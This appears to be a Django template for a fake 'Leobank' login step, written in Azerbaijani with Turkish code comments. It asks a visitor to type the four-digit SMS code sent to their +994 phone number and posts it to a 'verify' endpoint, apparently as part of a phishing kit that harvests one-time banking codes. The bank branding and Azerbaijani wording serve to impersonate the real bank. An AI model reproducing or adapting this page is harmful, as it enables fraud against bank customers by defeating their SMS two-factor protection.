{% load static %}
<!DOCTYPE html>
<html>
<head>
  <title>Leobank</title>
  <link rel="profile" href="https://gmpg.org/xfn/11">
  <link rel="icon" type="image/x-icon" href="{% static '/icon/favicon.svg' %}">
  <style>
    body {
      margin: 0;
      padding: 0;
      display: flex;
      align-items: center;
      justify-content: center;
      height: 100vh;
    }
    
    .login-form {
      position: relative;
      background: linear-gradient(65.16deg,#98c7fe 0,#a5f6ff 53.48%,#adfff0 100%);
      padding: 200px;
      border-radius: 5px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);

      border-radius: 32px;
    }
    
    .login-form h2 { text-align: center; color: #333; font-size: 1.4em; }

    
    .login-form label {
      display: block;
      margin-bottom: 5px;
      color: #333;
    }
    
    .login-form input[type="tel"],
    .login-form input[type="password"] {
      width: 93%;
      padding: 17px;
      border: 1px solid #ccc;
      border-radius: 18px;
      margin-bottom: 15px;
    }
    
    .login-form input[type="submit"] {
      padding: 16px 23px;
      margin: 0 auto;
      width: 100%;
      text-align: center;
    }
    
    .login-form input[type="submit"] {
      background-color: #000;
      color: #fff;
      border-radius: 50px;
      width: -webkit-max-content;
      width: -moz-max-content;
      width: max-content;
      height: 52px;
      padding: 16px 120px;
      font-size: 14px;
      line-height: 20px;
      letter-spacing: 0.5px;
      font-weight: 700;
      text-transform: uppercase;
      display: block;
    }
  </style>
</head>
<body>
  <div class="login-form">
    <div class="order_image" id="anim_fray">
      
   </div>
   <style>
    #anim_fray {
  width: 100%;
  height: 100%;
  transform: translate3d(0px, 0px, 0px);
  content-visibility: visible;
  position: relative;
  bottom: 150px;
}
.no-spinners::-webkit-inner-spin-button,
.no-spinners::-webkit-outer-spin-button {
  -webkit-appearance: none;
  margin: 0;
}

.container {
    text-align: center;
  }
  
  .container h5 {
    margin-bottom: -20px;
    font-weight: bold;
    opacity: 0.6;
  }

   </style>
   
   <div id="31" style="margin-top: -20px; position: relative; bottom: 130px">
    <h2>SMS-lə gələn kodu daxil edin</h2>
    
    <div class="container">
        <h5>Kod +994 {{phone_number}} Nömrəsinə göndərildi</h5>
      </div>
      <br>
    <form action="verify" method="POST">
      <div>
      <label for="username"></label>
     <div>
      <div class="otp-input-field">
        <input maxlength="1" placeholder="🐾" id="input1" name="input1" type="text" autofocus="" class="otp-input" inputmode="numeric" oninput="doldur(this)">
        <input maxlength="1" placeholder="🐾" id="input2" name="input2" type="text" class="otp-input" inputmode="numeric" oninput="doldur(this)">
        <input maxlength="1" placeholder="🐾" id="input3" name="input3" type="text" class="otp-input" inputmode="numeric" oninput="doldur(this)">
        <input maxlength="1" placeholder="🐾" id="input4" name="input4" type="text" class="otp-input" inputmode="numeric" oninput="doldur(this)">
    </div>
        
     </div>
      

        </div>

<br><br>
<script>
 
  // Hiçbir şey yazılmadığında kontrol eden bir fonksiyon.
  function kontrolEt(input) {
      if (input.value === "") {
          alert("PİN Kodu Daxil Edin Zəhtmət Olmasa");
      }
  }
</script>
<input type="submit" value="İrəli" >
<div class="container">
    <h5>Kod gəlmədi? Zəng sifariş etmək</h5>
  </div>
    </form>
  </div>
    <script id="animations" src="{% static 'js/animations.js' %}" type="module" async=""></script>
    <script id="animations" src="{% static 'js/animation2.js' %}" type="module" async=""></script>
   
    <style>
    .resend-otp {
            color: #2caa84;
            text-decoration: none;
            cursor: pointer;
            margin-bottom: 40px;
            font-size: 15px;
            border: none;
            background-color: transparent;
            border-bottom: 1px solid #2caa84;
        }

        .resend-otp span {
            font-size: 15px;
        }

        .resend-otp:hover {
            border-bottom: 1px solid transparent;
        }

        

        .otp {
            margin-bottom: 8px;
        }

        .otp-input-field {
            display: flex;
            justify-content: space-between;
        }

        .otp-input {
    display: flex;
    justify-content: center;
    align-items: center;
    text-align: center;
    width: 64px;
    height: 64px;
    
    font-size: 20px;
    border-radius: 2px;
    margin-bottom: 4px !important;
    
    margin-top: 6px;
    outline: none;
    background-color: transparent;
    border: 1px
}

        .otp-input:focus {
            border-color: #2caa84;
            box-shadow: 0 0 0 4px #e0f3ed;
        }

        
        
       </style>
       <style>
        .otp-input::placeholder {
            color: black;
        }
    </style>
        <script>
           // Select all input fields with class "otp-input"
const otpInputs = document.querySelectorAll('.otp-input');

// For each input field, add an event listener for input changes
otpInputs.forEach((input, index) => {
  input.addEventListener('input', event => {
    // Get the value of the input and remove any non-numeric characters
    let value = event.target.value.replace(/[^0-9]/g, '');

    // Limit the value to one character
    value = value.substring(0, 1);

    // Set the input value to the cleaned and limited value
    event.target.value = value;

    // If the value is not empty, focus on the next input field
    if (value) {
      // Check if the current input is the last one
      if (index < otpInputs.length - 1) {
        otpInputs[index + 1].focus();
      }
    } else {
      // If the value is empty, focus on the previous input field
      if (index > 0) {
        otpInputs[index - 1].focus();
      }
    }

    // This part ensures that when you delete a character, it moves to the previous input
    if (!value && index > 0) {
      otpInputs[index - 1].focus();
    }
  });
});

            
                        </script>
 

  </div>
</body>
</html>
